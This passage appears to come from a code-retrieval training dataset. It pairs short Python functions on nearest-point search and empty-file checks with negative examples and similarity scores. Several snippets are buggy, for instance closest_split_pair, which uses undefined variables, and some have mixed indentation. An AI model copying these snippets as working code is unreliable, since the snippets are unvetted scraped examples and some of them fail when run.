all_dist.append(dist)\r\n # find nearest intersection point index\r\n near_dist = min(all_dist)\r\n n_id = all_dist.index(near_dist)\r\n n_DPRIP = DPRIP[n_id]\r\n\r\n 
ND_list.append(near_dist)\r\n N_DPRIP.append(n_DPRIP)\r\n \r\n return ND_list,N_DPRIP", "def nearest_neighbor_within(others, point, max_distance):\n search_region = point.buffer(max_distance)\n interesting_points = search_region.intersection(MultiPoint(others))\n \n if not interesting_points:\n closest_point = None\n elif isinstance(interesting_points, Point):\n closest_point = interesting_points\n else: \n distances = [point.distance(ip) for ip in interesting_points\n if point.distance(ip) > 0]\n closest_point = interesting_points[distances.index(min(distances))]\n \n return closest_point", "def fast_closest_pair(cluster_list):\n \n def fast_helper(clist, h_order, v_order):\n \"\"\"\n Divide and conquer method for computing distance between closest pair of points\n Running time is O(n * log(n))\n h_order and v_order are lists of indices for clusters\n ordered horizontally and vertically\n Returns a tuple (distance, idx1, idx2) with idx1 < idx 2 where\n clist[idx1] and clist[idx2]\n have the smallest distance dist of any pair of clusters\n \"\"\"\n def _div(h_order):\n \"\"\"\n divide\n \"\"\"\n return int(math.ceil(len(h_order) / 2.0))\n\n # base case\n if len(h_order) <= 3:\n sublist = [clist[h_order[i]]\n for i in range(len(h_order))]\n res = slow_closest_pair(sublist)\n return res[0], h_order[res[1]], h_order[res[2]]\n\n # divide\n mid = 0.5 * (clist[h_order[_div(h_order) - 1]].horiz_center() +\n clist[h_order[_div(h_order)]].horiz_center())\n\n _hlr = h_order[0: _div(h_order)], h_order[_div(h_order): len(h_order)]\n min_d = min(fast_helper(clist, _hlr[0],\n [vi for vi in v_order if vi in frozenset(_hlr[0])]),\n fast_helper(clist, _hlr[1],\n [vi for vi in v_order if vi in frozenset(_hlr[1])]))\n\n # conquer\n sss = [vi for vi in v_order if\n abs(clist[vi].horiz_center() - mid) < min_d[0]]\n\n for _uuu in range(len(sss) - 1):\n for _vvv in range(_uuu + 1, min(_uuu + 4, len(sss))):\n dsuv = clist[sss[_uuu]].distance(clist[sss[_vvv]])\n min_d = min((min_d), (dsuv, sss[_uuu], sss[_vvv]))\n\n return min_d[0], min(min_d[1], min_d[2]), max(min_d[1], min_d[2])\n\n # compute list of indices for the clusters ordered in the horizontal direction\n hcoord_and_index = [(cluster_list[idx].horiz_center(), idx)\n for idx in range(len(cluster_list))]\n # print hcoord_and_index\n hcoord_and_index.sort()\n # print hcoord_and_index\n horiz_order = [hcoord_and_index[idx][1]\n for idx in range(len(hcoord_and_index))]\n\n # compute list of indices for the clusters ordered in vertical direction\n vcoord_and_index = [(cluster_list[idx].vert_center(), idx)\n for idx in range(len(cluster_list))]\n vcoord_and_index.sort()\n vert_order = [vcoord_and_index[idx][1]\n for idx in range(len(vcoord_and_index))]\n\n # compute answer recursively\n # print vert_order[0].real\n fast_helper(cluster_list, horiz_order, vert_order)\n answer = fast_helper(cluster_list, horiz_order, vert_order)\n # return slow_closest_pairs(cluster_list)\n return (answer[0], min(answer[1:]), max(answer[1:]))", "def _closest_point(self, x, z, start_param, Ns):\n pi = np.pi\n def f(t):\n px, pz = self(t)\n return np.sqrt((x-px)**2 + (z-pz)**2)\n if start_param is None:\n x0 = brute(lambda x: f(x[0]), [[0, pi]], Ns=Ns, finish=None)\n step = np.pi/(Ns-1)\n res = minimize_scalar(\n f, bounds=[max(0, x0-step), min(np.pi, x0+step)], method='bounded',\n options=dict(xatol=1e-12),\n )\n else:\n res = minimize_scalar(f, bracket=(start_param, pi/Ns),\n options=dict(xtol=1e-12))\n la = res.x\n return la", "def closest_split_pair(x, delta):\n mid_point_x = 
x[len(x)//2][0]\n strip = []\n\n for point in y:\n if abs(mid_point_x - point[0]) < delta:\n strip.append(point)\n strip = sorted(strip, key= lambda x: x[0])\n\n n = len(strip)\n min_distance = float(\"inf\")\n last_pair = None\n for i in range(n):\n for j in range(i+1, i+7):\n if j < n:\n result = distance(points[i], points[j])\n if result < min_distance:\n min_distance = result\n last_pair = [points[i], points[j]]\n return last_pair", "def slow_closest_pair(cluster_list):\n \n min_distance = set([(float('inf'), 0, 0)])\n\n for num_idx1 in xrange(len(cluster_list)):\n _node_idx1 = cluster_list[num_idx1]\n num_idx2 = num_idx1 + 1\n\n for _node_idx2 in cluster_list[num_idx2:]:\n new_distance = pair_distance(cluster_list, num_idx1, num_idx2)\n\n if list(new_distance)[0] < list(min_distance)[0][0]:\n min_distance = set([new_distance])\n elif list(new_distance)[0] == list(min_distance)[0][0]:\n min_distance.add(new_distance)\n num_idx2 += 1\n\n return min_distance.pop()", "def point_distances(src_points, gt_points):\n distances = EuclideanDistances(np.matrix(src_points), np.matrix(gt_points))\n return np.array(distances)", "def findNearset(x,y,lon,lat):\n dist = np.sqrt( (lon - x)**2 + (lat - y)**2)\n\n return np.argwhere(dist==dist.min())[0][0]", "def get_closest_offices(office_list, position):\n list_to_order = []\n for office in office_list:\n coord = [float(c) for c in office[\"Coordinates\"]]\n distance = math.sqrt(math.pow(position[0] - coord[0], 2) + math.pow(position[1] - coord[1], 2))\n list_to_order.append((office[\"Id\"], distance))\n\n ids = [k[0] for k in sorted(list_to_order, key=lambda x: x[1])]\n return [get_office_by_id(office_list, k) for k in ids if k is not None][:3]", "def closest_point(graph, point_3d):\n current_point = (point_3d[0], point_3d[1])\n closest_point = None\n dist = 100000\n for p in graph.nodes:\n d = LA.norm(np.array(p) - np.array(current_point))\n if d < dist:\n closest_point = p\n dist = d\n return closest_point", "def nearest_input_pts(\n in_latlons: ndarray, out_latlons: ndarray, k: int\n) -> Tuple[ndarray, ndarray]:\n # Convert input latitude and longitude to XYZ coordinates, then create KDtree\n in_x, in_y, in_z = ecef_coords(in_latlons[:, 0].flat, in_latlons[:, 1].flat)\n in_coords = np.c_[in_x, in_y, in_z]\n in_kdtree = KDTree(in_coords)\n # Convert output to XYZ and query the KDtree for nearby input points\n out_x, out_y, out_z = ecef_coords(out_latlons[:, 0].flat, out_latlons[:, 1].flat)\n out_coords = np.c_[out_x, out_y, out_z]\n distances, indexes = in_kdtree.query(out_coords, k)\n # Avoid single dimension output for k=1 case\n if distances.ndim == 1:\n distances = np.expand_dims(distances, axis=1)\n if indexes.ndim == 1:\n indexes = np.expand_dims(indexes, axis=1)\n return distances, indexes", "def find_best_reference_set(points):\n\n # Group points by color\n grouped = defaultdict(list)\n for point in points:\n grouped[point.color].append(point)\n\n # Brute force search on all combinations of points with unique colors\n possibilities = product(*[grouped[key] for key in grouped])\n return min(possibilities, key=summed_distances)", "def eeg_findnearest(x,X):\t\n\t#x array or vector and X a scalar\n\tabsdif = np.abs(x-X)\n\tval = np.min(absdif)\n\tidx = absdif.argmin()\n\treturn val,idx", "def closestClusterAndDistance(p, centers):\n\tbestIndex = 0\n closest = float(\"+inf\")\n for i in range(len(centers)):\n distance = np.sqrt(np.sum((np.array(p) - centers[i]) ** 2))\n if distance < closest:\n closest = distance\n bestIndex = i\n return 
(bestIndex, closest)", "def min_dist_grid(self, list_of_grids, self_pos):\n\t\t\n\t\tdistance = []\n\t\tcp_list_of_grids = list(list_of_grids)\n\t\t\n\n\t\tfor grid in cp_list_of_grids:\n\t\t\tdistance.append((dist(grid, self_pos), cp_list_of_grids.index(grid)))\n\t\tgrid_point = min(distance)\n\t\tidx = grid_point[1]\n\t\tpoint = cp_list_of_grids[idx]\n \t\n \t\tself_pos[0] = point[0]\n \t\tself_pos[1] = point[1]\n\n \t\tself.Bubble_last_pos = [point[0], point[1]]", "def slow_closest_pair(cluster_list):\n cl_copy = cluster_list[:]\n output_list = [99999, -1, -1]\n\n for index1 in range(len(cl_copy)):\n \tfor index2 in range(1,len(cl_copy)):\n \t\ttemp_dist = pair_distance(cl_copy, index1, index2)\n \t\tif output_list[0] > temp_dist[0] and index1 != index2:\n \t\t\toutput_list = [temp_dist[0], temp_dist[1], temp_dist[2]] \t\n return tuple(output_list)", "def get_closest_waypoint(self, pose, waypoints):\n #TODO implement\n\n\tmin_dist = float(\"inf\")\n\tclosest_wp_idx = -1\t\n\n for idx, wp in enumerate(waypoints):\n\t\tdist = self.dist_to_point(pose, wp.pose.pose)\n\t\tif(dist < min_dist):\n\t\t\tmin_dist = dist\n\t\t\tclosest_wp_idx = idx\n\treturn closest_wp_idx", "def calc_dist(self, points): \n dist_x = [self._current_pose.position.x - p.pose.position.x for p in points]\n dist_y = [self._current_pose.position.y - p.pose.position.y for p in points]\n dist = np.hypot(dist_x,dist_y) \n if len(dist) > 0:\n return min(dist) \n else: \n return 0", "def point_distances(self, params=None):\n if params is None:\n params = self.collocation_points()\n with self.fix_evaluator():\n pts = np.array([self(la) for la in params])\n deltas = np.diff(pts, axis=0)\n distances = norm(deltas, axis=1)\n return distances", "def get_best_distances(distances, points_base, points_compare):\n indexes = get_interbreeding_indexes(2, including_same=True, cross=True)\n\n for i in range(len(indexes)):\n distance = calculate_distance(\n points_base[indexes[i][0]],\n points_compare[indexes[i][1]]\n )\n\n if distance < distances[indexes[i][0]]:\n distances[indexes[i][0]] = distance\n\n return distances", "def closest_fruit(maze, currX, currY, fruit_list):\n curr_min = sys.maxsize\n for position in fruit_list:\n distance = Astar(maze, currX, currY, position[0], position[1])\n if distance < curr_min:\n curr_min = distance\n return curr_min", "def find_closest_intersections(wire_data):\n\n # Find the intersection of the two lists\n intersections = find_intersections(wire_data)\n\n # For each intersection measure distance from the centre\n dists = [abs(point[0]) + abs(point[1]) for point in intersections]\n\n return min(dists)", "def __iter__(self):\r\n curpt, done = [0,0], numpy.zeros(self.shape, dtype='bool')\r\n while not done.all():\r\n #The following line computes the nearest remaining point...\r\n closest = numpy.unravel_index((numpy.where(done, numpy.inf,\r\n (numpy.sum((self.points - curpt)**2, axis=-1))) if\r\n self.smartiter else done).argmin(), self.shape)\r\n #...but only if self.smartiter is true.\r\n done[closest] = True\r\n curpt = self.points[closest]\r\n yield closest", "def nearest(items, pivot):\n return min(items, key=lambda x: abs(x - pivot))", "def fast_closest_pair(cluster_list):\n num_points = len(cluster_list)\n closest_pair = (float('inf'), -1, -1)\n\n if num_points <= 3:\n return slow_closest_pair(cluster_list)\n else:\n split_point = num_points/2\n left_cluster = [cluster_list[idx_l] for idx_l in range(split_point)]\n right_cluster = [cluster_list[idx_r] for idx_r in range(split_point, 
num_points)]\n left_best = fast_closest_pair(left_cluster)\n right_best = fast_closest_pair(right_cluster)\n closest_pair = min(left_best,\n (right_best[0], right_best[1] + split_point, right_best[2] + split_point))\n mid_distance = .5*(cluster_list[split_point - 1].horiz_center() + cluster_list[split_point].horiz_center())\n closest_pair = min(closest_pair,\n closest_pair_strip(cluster_list, mid_distance, closest_pair[0]))\n return closest_pair", "def solve(points):\n # it's not a list\n if not isinstance(points, list):\n raise TypeError(\"solve expects a list of n Point objects, received %s\" % points)\n\n plen = len(points)\n if plen < 2:\n return []\n\n # preallocate a simple map to tell us whether a Point is spanned\n spanned = [False] * plen\n # span the first point\n spanned[0] = True\n edges = []\n result = []\n\n for lkey, left in enumerate(points):\n for rkey, right in enumerate(points):\n #if left != right:\n edges.append((lkey, rkey, edist(left, right)))\n\n edges.sort(key=itemgetter(2))\n\n while len(result) < plen - 1:\n for edge in edges:\n lkey, rkey, _ = edge\n if spanned[lkey] != spanned[rkey]:\n result.append((points[lkey], points[rkey]))\n spanned[lkey] = spanned[rkey] = True\n break\n\n return result", "def fit (self,points):\n all_coordinates = [p.coordinates for p in points]\n for i in range(len(all_coordinates[0])):\n if (len(self.min_coordinate)<=i):\n self.min_coordinate.append(all_coordinates[0][i])\n self.max_coordinate.append(all_coordinates[0][i])\n for x in all_coordinates:\n if(self.max_coordinate[i]<x[i]):\n self.max_coordinate[i]=x[i]\n if(self.min_coordinate[i]>x[i]):\n self.min_coordinate[i]=x[i]", "def get_nearest_offgrid_pin(self, pin, insufficient_list):\n # Find the coordinate with the most overlap\n best_coord = None\n best_dist = math.inf\n for coord in insufficient_list:\n track_pin = self.convert_track_to_pin(coord)\n min_dist = pin.distance(track_pin)\n if min_dist<best_dist:\n best_dist=min_dist\n best_coord=coord\n \n return set([best_coord])" ]
[ "0.7746659", "0.7575003", "0.7565495", "0.74907386", "0.73184353", "0.72928536", "0.7258349", "0.722991", "0.6869522", "0.67983764", "0.67398", "0.67391354", "0.67248935", "0.6715504", "0.6708824", "0.66605735", "0.661304", "0.6607124", "0.6598075", "0.659383", "0.65821815", "0.6560994", "0.65261304", "0.6524797", "0.6507839", "0.65025985", "0.6480889", "0.64769864", "0.64741105", "0.6466876", "0.6440018", "0.6425536", "0.6386456", "0.63747317", "0.635754", "0.6353659", "0.63520116", "0.6328228", "0.6297446", "0.6281719", "0.6281122", "0.627367", "0.62498033", "0.62429374", "0.6235604", "0.61935884", "0.6187533", "0.61689883", "0.616461", "0.61604035", "0.6158723", "0.6157153", "0.615465", "0.6153623", "0.614732", "0.6126843", "0.61216885", "0.6114247", "0.6102109", "0.6074916", "0.6050748", "0.60488385", "0.6045505", "0.60425115", "0.6022679", "0.6021309", "0.600924", "0.600888", "0.6003676", "0.60021824", "0.5998458", "0.599551", "0.59934103", "0.59903955", "0.59840316", "0.59791696", "0.5974467", "0.5971627", "0.59624845", "0.5959449", "0.5953791", "0.5953255", "0.5943313", "0.59394544", "0.5938481", "0.5933163", "0.59324676", "0.59321314", "0.5912922", "0.5903189", "0.58978224", "0.5895623", "0.58917284", "0.5891587", "0.58836925", "0.58809114", "0.58716583", "0.58711904", "0.5868928", "0.58656174" ]
0.81107926
0
Tests whether the input file is empty. If input is not empty, it returns the file; otherwise it exits from the system.
def input_file_test(input): try: if os.stat(input).st_size == 0: print ("The input file %s is empty, exiting." % input) sys.exit() except OSError as e: print(e) sys.exit() return input
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_empty_file(self):\n\t\tmain.Main(['input/empty.txt']).run()\n\t\tself.assertTrue(filecmp.cmp('output/output.csv', 'output/empty.csv'))", "def is_file_empty(file_name):\n # open ile in read mode\n with open(file_name, 'r') as read_obj:\n # read first character\n one_char = read_obj.read(1)\n # if not fetched then file is empty\n if not one_char:\n return True\n return False", "def is_empty(file):\n with open(file, 'rb') as f:\n return not f.read(1)", "def found_empty_file(self):\n self.is_empty = True", "def test_empty_file(self):\n input_file = \"does_not_exist.fasta\"\n self.assertFalse(os.path.isfile(input_file))\n\n cline = XXmotifCommandline(outdir=self.out_dir, seqfile=input_file)\n\n try:\n stdout, stderr = cline()\n except ApplicationError as err:\n self.assertEqual(err.returncode, 255)\n else:\n self.fail(f\"Should have failed, returned:\\n{stdout}\\n{stderr}\")", "def is_file_empty(file_path):\n # Check if file exist and it is empty\n return os.path.exists(file_path) and os.stat(file_path).st_size == 0", "def is_empty_file(fpath):\n return \\\n fpath is not None and \\\n os.path.isfile(fpath) and \\\n os.path.getsize(fpath) == 0", "def test_empty_file(self):\n with open(os.path.join(test_dir, \"empty_file.txt\")) as f:\n for idx, line in enumerate(reverse_readline(f)):\n raise ValueError(\"an empty file is being read!\")", "def file_is_empty(file_name):\n try:\n if os.stat(file_name).st_size > 0:\n return False\n except Exception: # pylint: disable=broad-except\n pass\n\n return True", "def is_valid_file(input_file):\n if not os.path.isfile(input_file):\n print('File \\'{}\\' not found.'.format(input_file))\n exit(1)\n return input_file", "def input_file(path): \n if path is None : \n return None\n else : \n path = os.path.abspath(path)\n if not os.path.exists(path):\n raise IOError('File {} does not exists.'.format(path))\n return path", "def valid_file(fname):\r\n try:\r\n if os.stat(fname).st_size > 0: # if filename contains data\r\n return \"0\"\r\n else:\r\n return \"Selected file is empty....please reenter\"\r\n except OSError:\r\n return \"Can not find the file....please reenter\"", "def get_existing_file(msg, skip=False):\n inp = None\n while inp is None:\n inp = raw_input(msg)\n if skip and len(inp) == 0:\n return None\n if not os.path.isfile(inp):\n print \"Not a file:\", inp\n inp = None\n return inp", "def get_nonexisting_file(msg, skip=False):\n inp = None\n while inp is None:\n inp = raw_input(msg)\n if skip and len(inp) == 0:\n return None\n if os.path.isfile(inp):\n print \"Is a file:\", inp\n inp = None\n return inp", "def get_filename_as_agrv_if_no_ask(prompt):\n Found = False\n ln = len(sys.argv)\n while not Found:\n if ln < 2:\n file = input( prompt)\n else:\n file = sys.argv[1]\n try:\n RFH = open(file)\n Found = True\n except FileNotFoundError:\n print(\"%%Error! File not found!\")\n ln = 1\n# break\n return RFH", "def test_not_present_file(self):\n\t\ttry:\n\t\t\tmain.Main(['input/abc.txt']).run()\n\t\texcept:\n\t\t\tself.assertTrue(True)", "def get_file():\n # Main Loop\n while True:\n filename = input(\"Please enter the name of the file you want to work on: \")\n # Check if file exists...\n if path.exists(filename):\n print(\"File sucessfully retrieved. Returning to previous menu...\")\n print()\n return filename\n \n print(\"That file does not exist in your current directroy. 
Try again.\")\n print()", "def test_empty_file(self):\n settings = get_settings(\n PANDOC_EXTENSIONS=PANDOC_EXTENSIONS, PANDOC_ARGS=PANDOC_ARGS\n )\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"empty.md\")\n\n # If the file is empty retrieval of metadata should fail\n with self.assertRaises(Exception) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\"Could not find metadata. File is empty.\", message)", "def check_input_file(value):\n if not os.path.exists(value):\n raise argparse.ArgumentTypeError(f'Input file `{value}` does not exist')\n\n return value", "def test_empty_input_file(self, api_client):\n runner = CliRunner()\n\n expected = (\n \"Error: at least one query must be passed either as an argument \"\n \"(QUERY) or through the -i/--input_file option.\"\n )\n\n result = runner.invoke(\n subcommand.query,\n [\"-i\", StringIO()],\n parent=Context(main, info_name=\"greynoise\"),\n )\n assert result.exit_code == -1\n assert \"Usage: greynoise query\" in result.output\n assert expected in result.output\n api_client.query.assert_not_called()", "def test_empty_input_file(self, api_client):\n runner = CliRunner()\n\n expected = (\n \"Error: at least one query must be passed either as an argument \"\n \"(QUERY) or through the -i/--input_file option.\"\n )\n\n result = runner.invoke(\n subcommand.stats,\n [\"-i\", StringIO()],\n parent=Context(main, info_name=\"greynoise\"),\n )\n assert result.exit_code == -1\n assert \"Usage: greynoise stats\" in result.output\n assert expected in result.output\n api_client.query.assert_not_called()", "def test_the_main_empty_file(self):\r\n with self.assertRaises(SystemExit):\r\n the_main_function(\"testfile_empty_file.csv\")", "def test_read_quotes_empty_file(self):\n path = os.path.join(self.tempdir, \"emptyfile.txt\")\n # Create empty file\n open(path, 'a').close()\n quotes = api.read_quotes(path)\n self.assertEqual(0, len(quotes))", "def get_input_file():\n if len(sys.argv) < 3:\n return -1\n return sys.argv[2]", "def test_emptyfile():\n\n # check with an empty, open file-like object.\n a = bedparser.bedfile(StringIO(''))\n a = list(a)\n assert len(a)==0\n \n # now check with a filename.\n a = bedparser.bedfile('inputfiles/empty.bed')\n a = list(a)\n assert len(a) == 0", "def AskForFileName():\n file_doesnot_exsit = True\n file_name = None\n while file_doesnot_exsit:\n try:\n file_name = input(\"What is the name of the input file?\")\n file = open(file_name, 'r')\n file_doesnot_exsit = False\n except FileNotFoundError:\n print(\"File is not found\")\n return file_name", "def prune_empty(self): # FileObj.prune_empty\n return False # can't prune a file", "def is_input_file(self):\r\n return self.depth == 0", "def askInputFile():\n while True:\n print(\"Enter a valid .txt file\")\n # Try until a plain-text file is provided.\n try:\n fileName = easygui.fileopenbox(\"Enter a .txt file\",\n \"Open file\",\n default=\"C:\\\\\",\n filetypes=[\"*.txt\"])\n if fileName == None:\n raise \n except :\n pass\n else:\n return fileName", "def checkforfile(filename):\r\n try:\r\n inputlist =[]\r\n with open(filename,'ra') as fin:\r\n reader = csv.reader(fin)\r\n for row in reader:\r\n if row[0]!= '':\r\n inputlist.append(row)\r\n print (\" File Exists. 
It has \", len(inputlist), \" number of entries\" ) \r\n \r\n except IOError as (errno, strerror):\r\n print (\"IOError : ({0}) : {1}\".format(errno, strerror))\r\n\r\n finally:\r\n fin.close()\r\n return inputlist", "def file_populated(filepath):\n\n return file_exists(filepath) and os.stat(filepath).st_size > 0", "def test_check_if_output_file_exists():\n input_file = os.path.join(os.getcwd(), 'tests', 'input_test_file.docx')\n output_file = os.path.join(os.getcwd(), 'tests', 'output_test_file.txt')\n\n questions_parser = QuestionsParser()\n questions_parser.main(argv=['-i', input_file, '-o', output_file])\n assert os.path.exists(output_file)\n os.unlink(output_file)", "def validate_input_file(self):\r\n return os.path.isfile(self.input_file)", "def test_empty_file(self):\n\n temp = tempfile.NamedTemporaryFile()\n temp.flush()\n self.assertRaises(MalformedFileError, NBTFile, temp.name)", "def fileCheck(file):\n if not os.path.isfile(file):\n print('File : ',file)\n print('E... '+'no file')\n sys.exit()", "def input_file(path):\n\n path = os.path.abspath(path)\n if not os.path.exists(path):\n raise IOError('File %s does not exist.' % path)\n return path", "def existing_file(value):\n is_file = os.path.isfile(value)\n if value == \"\" or not is_file:\n argparse.ArgumentTypeError(\n \"Must specify an existing file for input\")\n return value", "def open_file():\r\n the_file = input (\"Enter a file name: \")\r\n while True:\r\n try: \r\n fp = open (the_file, \"r\")\r\n return fp\r\n except FileNotFoundError:\r\n the_file = input (\"Error. Enter a file name: \")", "def check(self, workspace: Workspace, u_file: UserFile) \\\n -> UserFile:\n if u_file.is_empty and not u_file.is_directory:\n workspace.add_error(u_file, self.ZERO_LENGTH,\n self.ZERO_LENGTH_MESSAGE % u_file.name,\n severity=Severity.INFO, is_persistant=False)\n workspace.remove(u_file, self.ZERO_LENGTH_MESSAGE % u_file.name)\n return u_file", "def read_or_exit(file_path):\n try:\n data = serialize.read(file_path)\n return data\n except IOError:\n print('ERROR: File does not exist or is invalid: {}'.format(file_path))\n exit(1)", "def read_full_file(self, filename):\n output_file = os.path.join(OUTPUT_PATH, filename)\n data_out = ''\n if os.path.exists(output_file):\n fid = open(output_file, 'rb')\n data_out = fid.read()\n fid.close()\n else:\n print('No file %s', filename)\n return data_out", "def get_filename():\n filename = input(\"Filename? \")\n while not filename:\n filename = input(\"Filename? 
\")\n return filename", "def check_for_preexisting_output_file(output_file_path):\n if path.exists(f\"{output_file_path}\"):\n print(\"Output file at specified save location file path already exists!\")\n print(\"Aborting operation!\")\n sys.exit()", "def test_missing_file():\n\n rv, out = getstatusoutput(f'{prg} -o {outfile}')\n assert rv != 0\n assert re.search('the following arguments are required: -f/--file', out)", "def existent_file(file_path):\n if not os.path.exists(file_path):\n raise argparse.ArgumentTypeError(\"Input file path does not exist\")\n return file_path", "def check_input_file(self):\n\n # Mission critical parameters\n if self.jobname is None:\n sys.exit('Batch_emto.check_input_file: \\'jobname\\' has to be given!')\n\n if self.runtime is None:\n self.runtime = \"48:00:00\"\n if self.emtopath is None:\n self.emtopath = \"./\"\n if self.EMTOdir is None:\n self.EMTOdir = \"$HOME/EMTO5.8/\"\n if self.runKGRN is None:\n self.runKGRN = True\n if self.runKFCD is None:\n self.runKFCD = True\n return", "def get_filename():\n filename = None\n while filename is None:\n filename = input(\"Enter a data file name: \")\n if not os.path.isfile(filename): #if the file doesn't exist\n print(\"Invalid File Name Entered!\")\n filename = None\n \n infile = open(filename)\n lines = infile.readlines()\n infile.close()\n return (lines, filename)", "def test_parse_empty_file(self):\n bin.parser.parse_file(None, self.mock_db, self.tf, False)", "def file_from_user():\n try:\n file = get_input(\"Please enter name of the file to get data from. For exit press 0: \")\n if file == \"0\":\n sys.exit()\n LocationList.add_location(read_from_csv(file))\n except FileNotFoundError:\n print(\"\\nThis file wasn't found. Try again or press 0 to exit.\\n\")\n file_from_user()", "def is_empty(self):\n if self.file_exists:\n with open_hdf5(self.file_name) as h:\n return len(h.keys()) == 0\n else:\n return True", "def get_message():\n message = None\n while not message:\n message_location = input(\"Input the message file: \")\n try:\n with open(message_location) as input_file:\n message = input_file.read()\n except FileNotFoundError:\n print(f\"{message_location} not found\")\n print(message)\n return message", "def isempty(self):\n\t\tif self.empty is None:\n\t\t\tempty = 1\n\t\t\tfor status in self:\n\t\t\t\tif isinstance (status.fsObj, JloFile):\n\t\t\t\t\tempty = 0\n\t\t\t\t\tbreak\n\t\t\tif empty == 1:\n\t\t\t\tfor status in self:\n\t\t\t\t\tif isinstance (status.fsObj, WorkingDirectory):\n\t\t\t\t\t\tif not status.fsObj.selected.isempty():\n\t\t\t\t\t\t\tempty = 0\n\t\t\t\t\t\t\tbreak\n\t\t\tself.empty = empty\n\t\treturn self.empty", "def check_file_location(file_path):\n\n\tp = pathlib.Path(file_path)\n\tif p.is_file():\n\t\t#if file exist but empty, remove it and call again start method\n\t\tif os.stat(file_path).st_size == 0:\n\t\t\tos.remove(file_path)\n\t\t\tstart()\n\t\telse:\t\n\t\t\treturn True\n\telse:\n\t\treturn False", "def test_ignore_empty_files(self):\n\n self.checker.config.file_header_ignore_empty_files = True\n node_mock = MagicMock()\n node_mock.stream.return_value.__enter__.return_value.read.return_value.decode.return_value = ''\n with self.assertNoMessages():\n self.checker.process_module(node_mock)", "def eof_check(self) -> bool:\n eof = False\n curr_pos = self.fileobject.tell()\n # print(curr_pos, self.st_size)\n chunk = self.fileobject.read(25)\n if chunk == '':\n # Is there something on the back burner??\n if len(self._backburner) > 0:\n self.fileobject = self._backburner.pop()\n 
# TODO: what if it is the end of the back burner file? Is that handled?\n else:\n eof = True\n else:\n self.fileobject.seek(curr_pos)\n return eof", "def is_valid_file(parser, arg):\n if not os.path.exists(arg):\n parser.error(\"The file %s does not exist!\" % arg)\n else:\n return arg", "def open_infile(infilename):\n if not infilename or infilename == \"-\":\n return sys.stdin\n else:\n return open(infilename, \"r\")", "def open_input_file(input_file):\n if input_file:\n if not os.path.isfile(input_file):\n sys.stderr.write(\n \"ERROR! Input file (%s) is not a normal file.\\n\" % input_file)\n sys.exit(1)\n try:\n return codecs.open(input_file, \"r\", \"utf8\")\n except:\n sys.stderr.write(\n \"ERROR! Could not open input file (%s) for reading:\\n\" % input_file)\n raise\n else:\n return sys.stdin", "def get_source_file(size, working_directory, clean=False):\n\n filename = str(size)+'mb.file'\n file_path = working_directory+os.path.sep+filename\n\n if clean:\n try:\n os.remove(file_path)\n except OSError:\n pass\n\n logger.debug(\"Checking whether input file exists: %s\", file_path)\n if not os.path.exists(file_path):\n logger.info(\"Creating file: %s\", file_path)\n os.system(\"head -c \"+str(size)+\"M < /dev/urandom > \"+file_path)\n\n return file_path", "def exists_not_empty(path):\n if os.path.exists(path) and os.stat(path).st_size > 0:\n return True\n else:\n return False", "def test_do_not_ignore_empty_files(self):\n\n node_mock = MagicMock()\n node_mock.stream.return_value.__enter__.return_value.read.return_value.decode.return_value = ''\n with self.assertAddsMessages(pylint.testutils.Message(\n msg_id='invalid-file-header',\n line=1,\n args=self.EXPECTED_HEADER)):\n self.checker.process_module(node_mock)", "def check_empty_desc_file(out):\n return MISSING_RESOURCE in out.lower()", "def test_non_empty_file_no_metadata(self):\n settings = get_settings(\n PANDOC_EXTENSIONS=PANDOC_EXTENSIONS, PANDOC_ARGS=PANDOC_ARGS\n )\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"no_metadata.md\")\n\n # If the file is not empty but has no metadata it should fail\n with self.assertRaises(Exception) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n \"Could not find metadata header '...' 
or '---'.\", message\n )", "def get_valid_filename(msg):\r\n\r\n filename = input(msg)\r\n while not os.path.exists(filename):\r\n print(\"That file does not exist.\")\r\n filename = input(msg)\r\n return filename", "def verify_file_exists(device, file, size=None, dir_output=None):\n\n filename = os.path.basename(file)\n directory = ''.join([os.path.dirname(file), '/'])\n dir_out = device.parse('ls -l {}'.format(directory), output=dir_output)\n exist = filename in dir_out.get('files', {})\n\n # size not provided, just check if file exists\n if not exist:\n log.info(\"File '{}' does not exist.\".format(file))\n return exist\n elif not size:\n log.info(\"File name '{}' exists\".format(file))\n return exist\n\n # File exists and check size\n file_size = int(dir_out.get('files', {}).get(filename, {}).get('size', -1))\n log.info(\n \"Expected size: {} bytes, Actual size : {} bytes\".format(\n size if size > -1 else 'Unknown',\n file_size if file_size > -1 else 'Unknown'))\n\n if size > -1 and file_size > -1:\n return size == file_size\n else:\n log.warning(\"File name '{}' exists, but could not verify the file size\".format(\n file))\n return True", "def f_is_empty(self):\n raise NotImplementedError(\"Implement this!\")", "def ofile_handle(self):\n if not self.status == \"finished\":\n raise NameError(\"redhawk: unfinished ofile check\")\n tries = 0\n while not self.ofile_exists() and tries < self.file_limit:\n time.sleep(self.file_delay)\n tries = tries+1\n \n if os.path.isfile(self.ofile_name()):\n return open(self.ofile_name(), \"r\")\n\n raise NameError(\"redhawk: unfound ofile\")", "def test_empty(self):\n self.assertFalse(os.path.exists('/'))", "def get_path():\n\n output_path = None\n while output_path is None:\n print question + \"Please enter the directory where you would like the file saved?\"\n output_path = raw_input()\n if os.path.isdir(os.path.expanduser(output_path)):\n pass\n else:\n os.system('clear')\n print warn + \"%s is not valid, please try again: \" % str(output_path)\n output_path = None\n return os.path.expanduser(output_path)", "def safe_open(filename, mode, return_none=False, zap=False):\n if 'w' in mode and os.path.exists(filename) and not zap:\n rounder_logger.error(\"ABORT: Output file exists '{}'. 
